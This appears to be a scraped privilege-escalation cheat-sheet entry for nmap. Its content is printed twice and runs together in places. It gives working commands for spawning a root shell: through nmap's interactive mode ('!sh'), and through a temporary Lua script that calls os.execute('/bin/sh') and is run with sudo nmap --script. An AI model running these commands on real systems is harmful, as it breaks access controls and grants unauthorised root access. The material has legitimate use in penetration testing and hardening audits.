nmap
works even if nmap is not allowed sudo, last ditch attempt
nmap --interactive
nmap> !shTF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
rootLast updated
works even if nmap is not allowed sudo, last ditch attempt
nmap --interactive
nmap> !shTF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
rootLast updated